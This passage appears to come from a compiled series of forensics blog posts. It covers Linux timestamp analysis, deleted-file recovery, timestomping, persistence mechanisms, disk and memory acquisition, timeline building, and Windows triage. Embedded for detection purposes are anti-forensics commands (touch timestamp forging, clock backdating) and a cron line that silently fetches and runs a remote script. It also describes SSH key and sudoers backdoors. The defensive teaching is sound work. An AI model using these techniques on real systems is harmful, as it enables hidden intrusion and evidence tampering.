artifacts like /var/crash/, old syslog exports, or even swap memory to analyze. --------------------------------------------------------------------------------------- 🔚 Final Thoughts Whether you’re on a live system , doing forensics , or trying to fix a misbehaving server, don’t forget: Logs don’t lie — you just need to know where they’re hiding. --------------------------------------Dean------------------------------------------
- Linux File System Analysis and Linux File Recovery: EXT2/3/4 Techniques Using Debugfs, Ext4magic & Sleuth Kit
When you're digging into Linux systems, especially during live forensics or incident response, understanding file system behavior is crucial. The ext4 file system is commonly used , and knowing how to read file timestamps properly can give you a solid edge in an investigation. Let's break it down in a very real-world , 🔹 1. Basic ls -l — Let’s Start Simple When you run: ls -l You get a list of files along with a timestamp. That timestamp? It’s the modification time (mtime) . That’s the default. If you're like me and wondering, "What if I want to see when a file was last accessed or changed in metadata?" , then you’ve got options. 🔹 2. Customize the Time Display (atime, ctime, etc.) Use --time= to get the info you care about: ls -l --time=atime # Shows last access time ls -l --time=ctime # Shows inode change time Note: c time is not "creation time" (confusing, I know). It's the time when metadata (permissions, ownership, etc.) changed. Want to know what time options ls supports? Just check: man ls 🔹 3. Can We See File Creation Time on ext4? Now here’s where it gets interesting — and a bit annoying. ext4 can support birth time (aka creation time) , but not all Linux distros expose it by default via normal tools. Some versions of ls, stat, or even the filesystem itself may not record it. So how do we go deeper? That’s where the magic of debugfs comes in. 🔹 4. stat Command — Detailed File Info Quick and handy: stat You’ll see Access, Modify, Change times and creation time as well . But again, Sometimes no creation time . Sad life 😅. 🔹 5. Using debugfs to Dig Deeper (Finding Birth Time or Inode Info) When you’re doing live response and the system won’t give you birth/creation time using stat, this is your go-to: sudo debugfs -R "stat " /dev/ ⚠️ You need the device name where the file system is mounted. How to find the device name? Use: df or df -h Sometimes you might find something like /dev/sdc or /dev/mapper/ubuntu--vg-root if LVM is used. Also check /etc/fstab: cat /etc/fstab This shows all persistently mounted devices, useful when the system uses LVM or /dev/mapper. Sometimes it’ll look like: /dev/disk/by-id/dm-uuid-LVM-... ✅ Example Use Case: Let’s say I want to check creation time for /var/log/syslog. Run: sudo debugfs -R "stat /var/log/syslog" /dev/sdc Boom! You'll now see: Inode Size Access time Modify time Change time Creation time (if available!) This is not the same stat command we used earlier. This one is a debugfs internal command . 🔹 6. Using debugfs in Interactive Mode You can drop directly into debugfs with: sudo debugfs /dev/sdc Once inside, you’re in a shell-like environment. Just run: stat /home/akashpatel/arkme No need for -R here — you're already inside. 🔹 7. Want Inode Number First? Sometimes, you want to grab the inode of a file before using debugfs. You can do this: ls -i /home/akashpatel/arkme Now if you’ve got an inode like 123456, and you're inside debugfs, just run: stat <123456> Or even: cat <123456> (Yeah, cat also works in debugfs!) 🔹 Pro Tips: Always double-check you’re using the right device — especially with forensic images or LVM setups. debugfs is super powerful, but read-only usage is safest in live forensics (avoid writing to the file system!). If you get errors running debugfs, make sure the device isn't actively in use or try accessing a mounted image instead. In a nutshell: Command What It Shows ls -l mtime (default) ls -l --time=atime Access time ls -l --time=ctime Metadata change time stat mtime, atime, ctime, crtime(sometimes) debugfs -R "stat " /dev/... Shows all 4 timestamps including birth time (if supported) debugfs (interactive) Explore with inode numbers, use stat, cat, etc. ------------------------------------------------------------------------------------------------------------- Lets Suppose You accidentally delete a super important file on a Linux system running an ext2/ext3/ext4 filesystem. The panic hits, right? But don’t worry—I’ll walk you through how to recover it using a mix of tools like debugfs , ext4magic , and Sleuth Kit . 🧰 1. Recover Deleted Files Using debugfs (Works Best on EXT2) If the f ilesystem is ext2 , then debugfs is your best buddy . It's got this neat command called lsdel that lists recently deleted files. 🔧 Basic Workflow Launch debugfs : sudo debugfs /dev/sdX Replace /dev/sdX with your actual device (e.g., /dev/sdc). List deleted files : lsdel Or: list_deleted_inodes You’ll get inode numbers of deleted files. Pick the one you want. View inode details : stat Preview content (yes, you can peek!): cat Recover the file : dump /desired/output/path/ 💡 Heads-up : This method is mostly for ext2 filesystems. Why? Because ext3 and ext4 clean up the data blocks after deletion , which makes recovery harder directly. ------------------------------------------------------------------------------------------------------------- 🧠 2. Recovery on EXT3 and EXT4 (Using Journal + ext4magic Tool) Now here’s where it gets a bit more interesting. With ext3/ext4, things aren’t that simple because once a file is deleted, the inode is wiped out. But all hope isn’t lost—we go after the journal . 🔒 Journal’s Inode is Always 8 Yup. To grab the journal: debugfs /dev/sdc dump <8> /path/to/save/journal.dump 🚀 Use ext4magic for Real Recovery This tool is specially made to deal with journal-based recovery. Install it if you haven’t: sudo apt install ext4magic 🛠️ Basic Command: sudo ext4magic /dev/sdc -j /path/to/journal.dump -m -d /path/to/recovery_folder Flags explained: -j: Path to journal dump file -m: Recover ALL deleted files -d: Where to store recovered files -a or -b: Time-based filtering (after/before a specific time) 🎯 Example: Recover files deleted in the last 6 hours ext4magic /dev/sdc -a "$(date -d "-6hours or -7days" +%s)" -j journal.dump -m -d ./recovered 💬 This gives you super fine control over what to recover. It’s way better than randomly guessing. Recovered Files ------------------------------------------------------------------------------------------------------------- 🔍 3. Sleuth Kit Magic – Inspect and Recover Like a Forensics Expert If you’re digging into a disk image , maybe from a compromised system or raw forensic capture, you’ll want to mount it and go deeper. 🧱 Mount the Image (Linux or WSL) sudo mkdir /mnt/test sudo mount -o ro,loop /path/to/linux.raw /mnt/test Now run: df Note down the mounted device name (e.g., /dev/loop0 or /dev/sdc). 🔎 Key Sleuth Kit Commands 1. fsstat – Filesystem Overview sudo fsstat /dev/sdc 2. fls – List Deleted Files (and More!) sudo fls -r -d -p /dev/sdc -r: Recursive -d: Deleted entries -p: Show full path 3. istat – Inode Metadata sudo istat /dev/sdc 4. icat – View File Content by Inode sudo icat /dev/sdc Perfect for checking the content of deleted files even if they don’t show up in the normal file tree. 🌀 Filesystem Journal Analysis with Sleuth Kit Sometimes, you want to peek into journal entries directly. Here’s how: 1. jls – List Journal Blocks sudo jls /dev/sdc | more 2. jcat – View Journal Block Content sudo jcat /dev/sdc This is raw, low-level stuff—but crucial when traditional recovery methods fall short. ------------------------------------------------------------------------------------------------------------- 📦 Bonus: File Carving with photorec If you’re like “Just give me all the lost files!”, then photorec is your hero. Install it: sudo apt install testdisk Run it: sudo photorec Just point it to your image or device, choose the file types you want to recover, and it does the rest. It’ll carve out all files it finds—even if directory info is gone. (Very Simple just follow the commands it shows) 🔍 Final Tip: Search Within Recovered Files Once you recover everything, you might want to search for a specific string, like an IP address or username: grep -Rail -a "192.168.1.10" ./recovered The -a treats binary files as text, which is super helpful during deep dives. ✅ Wrapping Up So, whether you’re on a forensic case or just accidentally nuked your presentation file, these tools have your back. Just remember: Use debugfs for ext2 . Use ext4magic + journal for ext3/ext4 . Use Sleuth Kit for image-based investigation. And photorec when you’re ready to say “Recover ALL the things!” -------------------------------------Dean---------------------------------------------------
- Timestomping in Linux: Techniques, Detection, and Forensic Insights
------------------------------------------------------------------------------------------------------ Before we dive into timestomping on Linux, a quick note: I've already written a detailed article on timestomping in Windows , where I covered what it is, how attackers use it, and most importantly— how to detect it effectively . If you're interested in understanding Windows-based timestomp techniques and detection strategies, make sure to check out the article linked below: 👉 https://www.cyberengage.org/post/anti-forensics-timestomping Now, let’s explore how timestomping works on Linux systems and what you can do to uncover such activity. ------------------------------------------------------------------------------------------------------ Let’s talk about something that often flies under the radar in Linux investigations— timestomping . If you’re into forensics or incident response, you’ve probably come across files where the timestamps just don’t seem right. Maybe a malicious script claims it was modified months before the attack even happened. Suspicious, right? That’s timestomping in action. 🔧 So, What Exactly Is Timestomping? Timestomping is a sneaky little trick attackers use to manipulate file timestamps in order to hide their activities. Basically, they change the "last modified," "last accessed," or even "created" dates of files, so things don’t look out of place during an investigation. Here are the four main timestamps you’ll see in Linux: atime – last time the file was accessed mtime – last time the content was modified ctime – last time metadata (like permissions) changed crtime – file creation time (only visible on some filesystems like ext4, and not easily accessible) The goal is simple: blend in . If the file looks like it’s been sitting around for months, maybe you won’t look at it twice. 🛠️ The Classic Way: Using touch in Linux The most common and dead-simple way to timestomp in Linux is with the touch command. 🧪 Basic Syntax: touch -t [YYYYMMDDhhmm.ss] file 🎯 Some Practical Examples: Set a custom access & modification time: touch -t 202501010830.30 malicious.sh Change only the access time: touch -a -t 202501010101.01 report.log Change only the modification time: touch -m -t 202501010101.01 report.log ❗ Important Note: touch cannot change ctime or crtime . That’s metadata Linux protects more tightly. ------------------------------------------------------------------------------------------------------------- 🧠 Pro Trick: Copy Timestamps from Another File Want to make one file mimic another? touch -r /home/akash/legitfile suspiciousfile Now suspiciousfile will have the same access and modification times as legitfile. Handy for blending in! 👀 But... Can We Detect This? Yes. Even though timestomping is subtle, there are a few tells if you know what to look for. 🕵️♀️ 1. Subsecond Precision = 0? Run stat on the file: stat suspiciousfile If you see nanoseconds like .000000000, it might’ve been altered using touch—since manual timestamps usually don’t include fine-grained precision. ----------------------------------------------------------------------------------------------------------- ⏳ System Time Manipulation: Another Sneaky Method Here’s another trick some attackers use—they change the system clock to backdate files. 🧪 How it Works: Turn off NTP (time syncing): sudo timedatectl set-ntp false Set a fake date/time: sudo date -s "1999-01-01 12:00:00" Create or drop your malicious files: touch payload.sh Restore the actual time: sudo timedatectl set-ntp true Now those files look like they were created in 1999—even though they were dropped minutes ago. 🔍 Real-World Detection Tips Here’s how we can catch these kinds of timestamp games: 📋 1. Command Monitoring Keep an eye on suspicious commands in your logs: touch -t touch -r date -s timedatectl hwclock 🧭 2. Timeline Inconsistencies Does a file’s mtime predate surrounding system events? Is ctime suspiciously newer than atime/mtime ? Are there clusters of files all modified at the same weird timestamp? Use stat to dig into these or check timelines with forensic tools (more on that below). 🛠️ Forensic Tools That Can Help Here are some tools I often use when digging into possible timestomping: auditd – Can log file events and command execution (like touch, date) Sysmon for Linux – A great way to track suspicious process activity Plaso / log2timeline – My go-to for creating timelines and spotting weird timestamp gaps Velociraptor – Awesome for live hunting across multiple systems Eric Zimmerman's Tools – These are more for Windows, but worth mentioning if you’re working across platforms or with NTFS images 🔚 Final Thoughts Timestomping isn’t flashy—but it’s effective. That’s what makes it dangerous. A single altered timestamp can throw off your entire investigation if you’re not paying attention. But once you know what to look for—whether it's zeroed-out nanoseconds, unusual ctime, or oddly-timed files—you can start to see through the smoke and mirrors. Stay curious, stay forensic. 🕵️♂️ ------------------------------------------------------------Dean--------------------------------------------
- Understanding Linux Service Management Systems and Persistence Mechanisms in System Compromise
Before I start, I have already touched on persistence mechanism in article (Exploring Linux Attack Vectors: How Cybercriminals Compromise Linux Servers) If you want you can check it out link below: https://www.cyberengage.org/post/exploring-linux-attack-vectors-how-cybercriminals-compromise-linux-servers --------------------------------------------------------------------------------------------------------- Understanding init.d and systemd Service management in Linux has evolved significantly over the years, transitioning from traditional init.d scripts to the more modern systemd system . Both play crucial roles in starting, stopping, and managing background services (daemons), but they differ greatly in functionality, design, and usability. init.d: The Traditional System The init.d system has historically been the backbone of Linux service management. It consists of shell scripts stored in the /etc/init.d directory , each designed to control the lifecycle of a specific service. Common Commands Service management through init.d typically involves: start – Launch the service stop – Terminate the service restart – Stop and start the service again status – Check if the service is running Limitations Despite being widely used for years, init.d has several limitations: Lack of standardization: Script behaviors can vary widely No built-in dependency handling: Scripts must manually ensure other services are available Slower boot times due to serial service initialization Runlevels Runlevels define the state of the machine and what services should be running: 0 – Halt 1 – Single user mode 2 – Multi-user, no network 3 – Multi-user with networking 4 – User-defined 5 – Multi-user with GUI 6 – Reboot Management Tools Depending on the Linux distribution: Debian-based systems: Use update-rc.d to manage services Fedora/RedHat-based systems: Use chkconfig for the same purpose Script Location /etc/init.d – Main l ocation for service scripts systemd: The Modern Standard Introduced in 2010, systemd was designed to overcome the shortcoming s of traditional init systems. Although initially controversial, it has since become the default service manager in most major Linux distributions. Advantages Parallelized startup for faster boot times Dependency management between services Integrated logging through the systemd-journald service Standardized unit files replace disparate shell scripts Unit Files Instead of shell scripts, systemd uses declarative unit files to define how services should behave . These files can be of different types, such as: *.service – Defines a system service *.socket – Socket activation *.target – Grouping units for specific states (like runlevels) Unit File Locations /etc/systemd/system/ – Local overrides and custom service files /lib/systemd/system/ – Package-installed units (symlinked to /usr/lib/systemd/system on some distros) /usr/lib/systemd/system / – Units installed by the operating system --------------------------------------------------------------------------------------------------------- systemd Timers vs Cron Jobs When it comes to establishing persistence on a Linux system, attackers and administrators alike have a range of tools at their disposal. Two commonly used scheduling mechanisms are systemd timers and cron jobs. Both serve the purpose of executing tasks at predefined intervals, but they differ in structure, control, and usage. Let’s take a closer look at each. systemd Timers With the adoption of systemd in most modern Linux distributions, systemd timers have emerged as a powerful and flexible way to schedule tasks . Much like Windows Scheduled Tasks, these timers can initiate background services at specific times or intervals. How They Work Systemd timers work in tandem with systemd service units. Typically, a timer will have a corresponding service file. For instance: data_exfil.timer → triggers data_exfil.service However, you can also explicitly define the service to trigger by adding Unit=custom.service in the .timer file. Key systemd Timer Commands: For managing systemd timers on a live system, use the following: Enables the timer to start at boot systemctl enable .timer Starts the timer immediately. systemctl start .timer Displays the current status, including the last and next trigger times. systemctl status .timer Why Use systemd Timers? Granular control over execution intervals Integration with other systemd features (dependencies, logging, etc.) More readable and maintainable compared to complex cron entries 2. Cron Jobs Cron has long been the go-to tool for task scheduling in Unix and Linux environments. It’s simple, reliable, and nearly universal. Format: <*> <*> <*> <*> <*> <*> :- minute (0 - 59) <*> :- hour (0 - 23) <*> :- day of the month (1 - 31) <*> :- month of the year (1 - 12) <*> :- day of the week (0 - 7; 0/7 = SUN) ( * )=wildcard for any value ( , )= list multiple values ( - )= specify a range ( / )= set increments within a range How It Works Cron jobs are defined in crontab files, which contain entries with six fields: /30 * wget -q -O - /attack.sh | sh This example runs a command every 30 minutes, silently fetching and executing a remote script — a classic example of how cron can be used maliciously. Crontab Commands Use these on a live system to inspect cron jobs: Lists current user’s cron jobs. crontab -l Cron File Locations On Debian-based systems, cron-related files are typically found in: /var/spool/cron/crontabs – per-user cron jobs /etc/cron.d/, /etc/cron.daily/, /etc/cron.hourly/ – system-wide jobs Why Use Cron? Universally supported across Unix-like systems Lightweight and straightforward Does not require systemd --------------------------------------------------------------------------------------------------------- Other Persistence Mechanisms 1. SSH as a Persistence Mechanism SSH is one of the most reliable methods for attackers to maintain persistent access to a compromised system. There are two primary types of SSH authentication mechanisms: password-based and key-based . While password-based authentication is common, key-based authentication is often favored for persistence due to its robustness and ease of use. How It Works: An attacker generates a public/private key pair on their own machine and then places the p ublic key into the victim system’s ~/.ssh/authorized_keys file . This allows them to authenticate to the system without needing to provide a password. Key-based SSH authentication is popular because once set up, the attacker can access the system remotely and continuously, even if the initial password is changed. To check for this persistence, system administrators should audit the following locations: /home//.ssh/authorized_keys If an unfamiliar key is present, it could indicate unauthorized access. 2. Bash Configuration Files Another method for creating persistence on a compromised system involves manipulating Bash configuration files . These files are typically executed when a user logs into a Bash shell, making them ideal for executing malicious scripts or commands automatically. Key Files to Review: Per-User Files: /home//.bashrc /home//.bash_profile These files are executed each time a user opens a new terminal session. If an attacker has modified these files, they may have inserted a script to run malicious commands. Other Per-User Bash Files: /home//.bash_login /home//.bash_logout These files are also executed during user login and logout events. Any modifications should be carefully reviewed. System-Wide Files: /etc/bash.bashrc /etc/profile /etc/profile.d/* The system-wide configuration files affect all users and may contain attacker's code or scripts. Check the modification timestamps for any unexpected changes. rc.local: /etc/rc.local (if it exists) This file, if present, runs scripts at system startup. While it might not exist by default on all systems, attackers can create it and add malicious commands to execute on boot. 3. udev Rules udev is a device manager for the Linux kernel, responsible for managing device nodes in /dev. Attackers can exploit this by creating custom udev rules to trigger scripts based on hardware events, such as when a USB device is connected . Key Files to Check: /etc/udev/rules.d/ Review the files in this directory for any new or suspicious rules that might automatically execute a script when specific hardware is connected (e.g., a USB stick). 4. XDG Autostart On systems with a graphical user interface (GUI), attackers may place scripts in directories related to XDG autostart . These scripts are automatically executed when the desktop environment starts, ensuring that malicious processes are launched every time the user logs in. Key Files to Review: System-Wide: /etc/xdg/autostart/ Per-User: /home//.config/autostart/ Any unfamiliar script in these directories could be a sign of persistent malware that runs whenever a user logs into the graphical environment. 5. Network Manager Scripts The NetworkManager is responsible for managing network connections on Linux systems. Attackers can exploit this system by placing scripts in the NetworkManager's dispatcher directory to trigger actions during network events, such as when a specific network interface comes online. Key Files to Review: /etc/NetworkManager/dispatcher.d/ Scripts in this directory are executed whenever there are changes to network interfaces. Reviewing these files can reveal hidden scripts designed to execute during network events. 6. Modifying Sudoers for Elevated Privileges Attackers often modify system configurations to ensure they can escalate privileges or maintain administrative access. One way to do this is by editing the sudoers file, which controls which users can run specific commands as root . Example Sudoers Entry: ALL=(ALL:ALL) ALL This entry allows any user to execute any command as any other user, including root. Attackers might add themselves to this file to gain elevated privileges at will. To check for unauthorized changes: Use sudo vi to safely edit and inspect the /etc/sudoers file. Look for unusual users or commands in the sudoers file that could grant an attacker unrestricted access. --------------------------------------------------------------------------------------------------------- Conclusion Persistence is a critical phase of the attack lifecycle. A comprehensive security audit should include checking not just user accounts and SSH keys but also background services, startup scripts, scheduled tasks, and even device event triggers. By understanding the various persistence mechanisms — from traditional cron jobs to modern systemd timers — security professionals can more effectively hunt, detect, and respond to adversarial activity before it escalates into a bigger breach. Key Takeaway: Effective persistence hunting means combining file integrity monitoring , service auditing , and user account audits into a regular security strategy. ------------------------------------------Dean----------------------------------------------------------
- Evidence Collection in Linux Forensics (Disk + Memory Acquisition)
Hey everyone! Today, we’re going to dive into a super important topic when it comes to Linux forensics — evidence collection .We’ll cover the classic tools like dd, dcfldd, and dc3dd, and also talk about modern memory acquisition methods and a very cool script called UAC . Let’s get right into it! Disk Imaging Tools: dd, dcfldd, and dc3dd When you're doing any kind of forensic work, the first rule is: capture an exact copy of the original data. In Linux, we have some legendary tools for this — and the best part? They're super easy to use once you get the hang of it! 1. dd – The Classic One You might think "dd" stands for something, but it actually doesn’t officially mean anything! It's a foundational UNIX tool for copying and converting files. Almost every Linux or UNIX-like system has it installed by default — making it a go-to for forensic investigators. It's often used to create bit-by-bit images of disks (i.e., exact copies). Example command: dd if=/dev/sda of=/path/to/image.dd bs=4M if = input file (your source device) of = output file (where you want to save the image) bs = block size (common values: 1M or 4M) Quick Tip: If you use /dev/sda as input, you capture the entire disk , including all partitions. If you use something like /dev/sda3, you're only capturing a specific partition . You can check your drives using: df -h And when naming your images, you'll often see extensions like .dd, .raw, or .img — they're all pretty standard. 2. dcfldd – Upgraded dd for Forensics dcfldd is basically an enhanced version of dd. Built by the U.S. Department of Defense Computer Forensics Lab (cool, right?). It adds features super useful for investigators: On-the-fly hashing (SHA256, SHA1, etc.) Status output (you see progress!) Splitting output into multiple smaller files. Example command: dcfldd if=/dev/sda of=/path/to/image.dd bs=4M hash=sha256 hashwindow=1G hash=sha256 will hash the image during acquisition. hashwindow=1G means it creates a hash after every 1GB chunk. 3. dc3dd – The Newest and Most Advanced dc3dd is another evolution, developed by the U.S. Department of Defense Cyber Crime Center (DC3) . It extends dcfldd with even more features : Better logging . Drive wiping and pattern writing (if needed). Detailed forensic reporting . Example command: dc3dd if=/dev/sda of=/path/to/image.dd log=/path/to/logfile.txt hash=sha256 hlog=/path/to/hashlog.txt This will: Capture the image. Log everything. Hash the image and save the hash to a separate file. Quick Summary: Tool Highlight dd Basic and universal dcfldd Adds hashing and better status reporting dc3dd Full forensic features with detailed logging Important: Across all three tools, if and of parameters stay the same — so once you learn one, you can easily switch to others! ------------------------------------------------------------------------------------------------------------ Linux Memory Acquisition: Capturing the Volatile Data Now, let’s move on to memory acquisition — another critical part of forensics. Memory holds running processes , network connections , encryption keys , and a lot of other sensitive stuff that disappears if the machine is powered off. Old School Method: In the early days, people used dd to dump memory from /dev/mem or /dev/kmem. But now, we have much better tools! Modern Tool: LiME (Linux Memory Extractor) LiME is specifically designed for live memory acquisition on Linux machines. You can find it here: 🔗 LiME GitHub Repository It allows you to grab a memory image without shutting down the system — which is super important in real investigations. Another Option: AVML (Accelerated Volatile Memory Acquisition) Built by Microsoft, AVML is a super lightweight tool for memory captures on Linux. You can grab it here: 🔗 AVML GitHub Repository Output: ------------------------------------------------------------------------------------------------------------ Extra Goodie: Using UAC Script for Artifact Collection! If you've followed my macOS forensic series, you already know about UAC (Universal Acquisition Collector) — Good news: UAC supports Linux too! 🔗 UAC GitHub Repository Here’s how UAC works: Enumerates available system tools. Loads the uac.conf configuration file . Builds a list of artifacts to collect. Collects data (files, hashes, timestamps). Creates a single output archive and hashes it. Generates a full acquisition log . Quick How-To for UAC on Linux First, download and unzip UAC: tar zxvf uac.tar.gz Inside the unzipped directory, you’ll find multiple folders. The profiles folder is important — it contains YAML files that define what artifacts will be collected. List available profiles: ./uac --profile list Run UAC to collect everything (using the full profile): sudo ./uac -p full /path/to/output/folder ✅ Done! Now you have a full snapshot of the system's forensic artifacts. What’s inside the output? A bodyfile — a text file with all the filesystem metadata (useful for timeline creation). A Live_Response folder — containing processes, network connections, user accounts, and much more. .stderr.txt files — if any command threw an error, it’s logged here. You can easily open and analyze these outputs on Linux or even Windows (with Notepad). Wrapping Up Evidence collection is the foundation of any good forensic investigation. Tools like dd, dcfldd, dc3dd, LiME , AVML , and UAC make it much easier to capture, preserve, and analyze critical data. Whether you're imaging a disk or grabbing volatile memory, remember: 👉 Accuracy and proper documentation are everything in forensics! -----------------------------------------Dean------------------------------------------------------
- Creating a Timeline for Linux Triage with fls, mactime, and Plaso (Log2Timeline)
Building a timeline during forensic investigations is super important — it helps you see what happened and when . Today, I’ll walk you through two simple but powerful ways to create timelines: Using fls + mactime Using Plaso / Log2Timeline (psteal, log2timeline, psort) Don’t worry — I’ll explain everything in a very simple way, just like we’re talking casually! -------------------------------------------------------------------------------------------------------- 🛠 Method 1: Using fls and mactime for Filesystem Timeline First things first: Make sure the tool is installed. If not, you can install it easily: sudo apt install sleuthkit The SleuthKit package gives you useful forensic tools like fls, mactime, icat, and more. Step 1: Create a Body File with fls Now, let's create the timeline body file: fls -r -m "/" /mnt/c/Users/Akash's/Downloads/image.dd > /mnt/c/Users/Akash's/Downloads/timeline.body What’s happening here? -r → Recursively walk through all directories and files. -m "/" → Mount point is root /. /mnt/.../image.dd → This is your disk image. 👉 Combining -r and -m "/", we tell fls: "Hey, start from root and go deep into everything inside." Tip: Check your .body output — it should look clean and pipe-delimited (| characters). If it looks good, you’re all set for the next step! Step 2: Create a CSV Timeline with mactime Now let's process the body file and create a readable timeline: mactime -b /mnt/c/Users/Akash's/Downloads/timeline.body -d -y > /mnt/c/Users/Akash's/Downloads/timeline.csv What do the options mean? -b → Body file input. -d → Output in delimited format (for spreadsheets). -y → Use UTC time zone. Optional: You can also specify a different timezone (not recommended generally): mactime -b file.body -d -y -z germany/berlin Or even specify a date range if you want: mactime -b timeline.body -d -y 2025-04-02 .. 2025-04-22 > timeline.csv Step 3: Analyze Timeline Use Timeline Explorer (Eric Zimmerman's free tool) to open and analyze your CSV file. It’s one of the easiest ways to slice and dice timeline data visually! You can even turn on hidden columns like UID, GID, Permissions by right-clicking and choosing "Column Chooser." Note: Since I’m running on ext4 filesystem , I'm able to see creation/birth times too. 👉 Important: Using fls gives you a filesystem timeline only (file creation, modification, access, and metadata changes). -------------------------------------------------------------------------------------------------------- 🧠 Method 2: Creating Timeline Using Plaso (Log2Timeline) If you want deeper timelines including event logs, browser history, and way more artifacts — use Plaso . I've already made two detailed guides on Plaso for Windows if you want to dive even deeper. Links coming below! 😉 Running Plaso/Log2Timeline on Windows https://www.cyberengage.org/post/running-plaso-log2timeline-on-windows A Deep Dive into Plaso/Log2Timeline Forensic Tools https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools Anyway, let’s jump into it. Option 1: Easy Way — Using psteal.py Let's run everything in a single command: psteal.py --source /mnt/c/Users/Akash's/Downloads/image.dd -o dynamic -w /mnt/c/Users/Akash's/Downloads/plasotimeline.csv What this does: Runs Log2Timeline + psort automatically. Saves output as a nicely formatted CSV (plasotimeline.csv). You can use .vmdk virtual machine images too: psteal.py --source /path/to/your.vmdk -o dynamic -w /path/to/output.csv Super clean and fast! Option 2: Manual Way — (Better Control) Want to control everything yourself? Here’s how: Step 1: Parse the Image with log2timeline.py log2timeline.py --storage-file timeline.plaso /path/to/image.dd timeline.plaso is the storage file that saves extracted events. Step 2: Check Metadata with pinfo.py pinfo.py timeline.plaso See event counts, sources, time ranges, and other goodies inside the .plaso file. Step 3: Create Timeline Output with psort.py psort.py -o dynamic -w timeline.csv timeline.plaso This command sorts the events and outputs them nicely to a CSV! -------------------------------------------------------------------------------------------------------- 💬 But wait… Why Manual Parsing? You might ask — if psteal.py is so easy, why bother with manual steps? Here’s the thing: Manual parsing lets you use powerful filters. You can selectively extract events, artifacts, or specific activities. It's way more flexible for bigger/messier investigations. 🎯 Artifact Filtering with Plaso (Advanced) Let’s say you want to pull only Bash shell history. Here’s how you can do that: Step 1: Download Artifacts Repository From: https://github.com/ForensicArtifacts/artifacts Inside, you'll find tons of .yaml files under the /data folder. Each YAML defines different forensic artifacts! Step 2: Run log2timeline with Artifact Filter log2timeline.py --storage-file test.plaso /path/to/image.vmdk --artifact-filters BashShellHistoryFile 👉 Tip: The names come from the YAML filenames — so if you wonder "where did BashShellHistoryFile come from?" — now you know. 😄 Output: Step 3: Run pinfo with created plaso file pinfo.py /path/to/outputfile.plaso Step 4: Run psort with created plaso file psort.py -o dynamic -w /mnt/c/Users/Admin/Downloads/test.csv /mnt/c/Users/Admin/Downloads/test.plaso Output: ---------------------------------------------------------------------------------------------------------- Using a Custom Filter File You can also create a mini YAML filter file like this: description: LinuxSysLogFiles type: include path_separator: '/' paths: - '/var/log/syslog*' And then run: log2timeline.py --storage-file test3.plaso /path/to/image.vmdk --filter-file /path/to/your_custom.yaml Common Issues Sometimes you may face weird errors while using artifact filters directly with .yaml (after downloading the files. If that happens, create your own YAML and use --filter-file instead. Pro Tip: Always create a full Plaso storage file first, and then filter during psort , instead of during log2timeline.This gives you more flexibility later! -------------------------------------------------------------------------------------------------------- 🛠 Bonus: Narrowing Timelines with Psort You can narrow results easily after timeline creation: Slice Around a Specific Time psort.py -o dynamic -w timeline.csv timeline.plaso --slice 2025-04-23T22:00:00+00:00 Default slice = 5 minutes before and after. Date Range Filter psort.py -o dynamic -w timeline2.csv timeline.plaso "date > '2025-04-01 23:59:59' and date < '2025-04-23 00:00:00'" This will output events only within your specified date window. -------------------------------------------------------------------------------------------------------- 🚀 Conclusion For simple filesystem timelines → fls + mactime works great. For full system artifact timelines → Plaso/Log2Timeline is the best. Recommendation: Always create a full .plaso file, then slice and filter later using psort.py . Would you also like me to format this for your website with: "Thanks for sticking with me through this article! See you in the next one — stay curious and keep exploring!" ----------------------------------------Dean---------------------------------------------------------
- Digital Forensics (Part 2): The Importance of Rapid Triage Collection - Kape vs FTK Imager
In the fast-evolving world of digital forensics, time is critical. Traditional methods of acquiring full disk images are becoming increasingly impractical due to the sheer size of modern storage devices. The reality is that 99% of the necessary evidence typically exists within just 1% of the acquired data. Instead of waiting hours for a full disk image, focusing on this crucial 1% can significantly speed up investigations. Why Rapid Triage Collection Matters Saves Time – Collecting only essential forensic artifacts allows investigators to start analyzing data sooner. Reduces Storage Needs – Full disk images consume massive amounts of storage, whereas triage collection focuses only on critical data. Enhances Efficiency – Investigators can prioritize relevant information and streamline the investigative process. Key Artifacts to Collect During Triage To ensure effective triage, forensic analysts should focus on specific files and artifacts that provide the most insight. These include: File System & Activity Logs $MFT (Master File Table) – Contains metadata about every file and folder on the system. $Logfile & USN Journal – Records changes such as file creation, modification, and deletion. Windows Registry Hives SAM – Stores user account information. SYSTEM – Contains system configuration details. SOFTWARE – Holds installed software and system settings. DEFAULT, NTUSER.DAT & USRCLASS.DAT – User-specific settings and configurations. AMCACHE.HVE – Tracks executed programs. System & User Activity Logs Event Logs (.evtx) – Tracks system and user activities. Other Log Files – Includes setup logs, firewall logs, and web server logs. Prefetch Files (.pf) – Evidence of executed programs, including access history. Shortcut Files (.lnk) – Indicates files and directories opened by the user. Jump Lists – Collection of shortcut files that reveal frequently accessed files and directories. Check Out the below article it contain detail analysis on almost all the artifacts: https://www.cyberengage.org/courses-1/windows-forensic-artifacts User-Specific Data Recent Folder & Subfolders – Stores recent document access history. AppData Folder – Contains browsing history, cookies, and cached files. Pagefile.sys & Hiberfil.sys – Can contain remnants of past user activity stored in virtual memory. Specialized Artifacts for Advanced Investigations Certain artifacts provide deeper insight into a user's actions and past activity, even if data has been deleted. Volume Shadow Copies What It Is: A point-in-time backup of an NTFS volume. Why It’s Useful: Helps recover deleted files, registry hives, and past system states. Location: C:\System Volume Information Recommended Tools: KAPE, VSCMount, Shadow Explorer. ShellBags What It Is: Tracks user navigation through directories, including removable storage and remote servers. Why It’s Useful: Helps reconstruct user activity even if the files/folders no longer exist. Location: Registry keys within NTUSER.DAT and USRCLASS.DAT. Recommended Tools: ShellBags Explorer, SBECmd. Triage Tools for Efficient Collection Forensic professionals can utilize powerful tools to automate and streamline triage collection: FTK Imager – Extracts files by extension. LECmd – Parses .lnk files. JLECmd, JumpList Explorer – Extracts jump list data. PECmd – Analyzes prefetch files. KAPE – Rapid collection of forensic artifacts. Shadow Explorer – Recovers files from volume shadow copies. ------------------------------------------------------------------------------------------------------------- When dealing with digital evidence, one of the most critical steps is proper acquisition. This ensures that investigators can analyze data without tampering with the original evidence. Two powerful tools for forensic acquisition are FTK Imager and KAPE . Each serves a different purpose, and understanding their strengths helps streamline forensic investigations. Why Imaging Matters in Digital Forensics In digital forensics, it’s generally not advisable to work directly on original evidence. Instead, investigators create forensic images— bit-by-bit copies of a device—to analyze while preserving the integrity of the original data. However, imaging takes time, and sometimes investigators must balance speed with thoroughness. This is where triaging becomes an essential technique. Acquisition Using FTK Imager FTK Imager is a well-known forensic imaging tool used to create full disk images, memory dumps, and file captures while maintaining forensic integrity. The 